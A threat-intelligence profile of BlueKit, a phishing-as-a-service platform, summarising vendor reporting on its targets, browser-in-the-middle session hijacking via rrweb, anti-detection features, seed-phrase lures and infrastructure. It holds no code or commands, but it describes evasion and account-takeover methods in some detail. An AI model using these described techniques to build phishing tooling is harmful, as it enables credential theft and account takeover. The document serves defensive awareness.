BlueKit

BlueKit is an actively operated commercial phishing-as-a-service (PhaaS) platform used for credential harvesting, session hijacking, and account takeover. Reporting describes it as a scalable cybercriminal ecosystem with structured subscription tiers, reseller support, centralized dashboards, automated phishing deployment, anti-detection tooling, bulk smishing, Telegram notifications, and integrations including CapSolver, NanoGPT, and Octo Browser. CloudSek assessed that its use of .su infrastructure, Jabber communications, and OPSEC-oriented tooling may suggest links to CIS-aligned cybercrime ecosystems. BlueKit targets financial institutions, cloud providers, cryptocurrency platforms, major consumer and e-commerce services, and developer platforms globally. Reported targets and templates include Microsoft, Google, Amazon, Apple, GitHub, Outlook, Hotmail, Gmail, Yahoo, ProtonMail, iCloud, Ledger, Trezor, banking institutions, and cryptocurrency wallets. Varonis reported that BlueKit offered 40 phishing templates at the time of its report, while CloudSek later identified 87 phishing kits in its catalog. Some kits include post-compromise automation such as password changes, backup-code generation, passkey enrollment, and victim lockout; hardware-wallet lures reportedly simulate firmware updates to steal 24-word recovery seed phrases. Technically, BlueKit has evolved from adversary-in-the-middle techniques to browser-in-the-middle (BitM) attacks. Netcraft reported that BlueKit uses the legitimate rrweb JavaScript library to stream a victim-facing browser session over WebSocket, allowing the attacker-controlled browser to load the legitimate login page while relaying victim interaction in real time. This enables authentication to complete in the attacker-controlled browser and yields valid session tokens for unrestricted account access. Netcraft also reported nearly 70 new BlueKit hostnames identified over a one-week period. CloudSek separately reported that BlueKit migrated to a peer-to-peer phishing page rendering model intended to conceal backend infrastructure from browser developer tools and conventional network analysis, increasing resilience against IOC-based detection and attribution. BlueKit includes extensive anti-analysis, anti-detection, and victim-filtering features. Reported capabilities include randomized CSS filters to hinder screenshot-based detection, frequently changing obfuscated JavaScript bundles, custom CAPTCHA pages impersonating Cloudflare or target brands, browser fingerprinting checks, WebRTC-based IP mismatch detection for proxy/VPN identification, phishing cloaking, anti-bot filtering, Safe Browsing monitoring, and Cloudflare phishing-check bypassing. Netcraft also reported a live monitoring system that updates every five seconds, allowing operators to watch victims during deceptive login sessions and track actions after login. Operationally, BlueKit has been described as resembling a SaaS offering, with product versioning, changelogs, support channels, subscription tiers, reseller programs, and automation tooling. Reported communications and infrastructure elements include Telegram, Jabber/XMPP, Session Protocol, PGP encryption, Tor infrastructure, and cryptocurrency-only payments. Known aliases directly supported by the content: bluekit.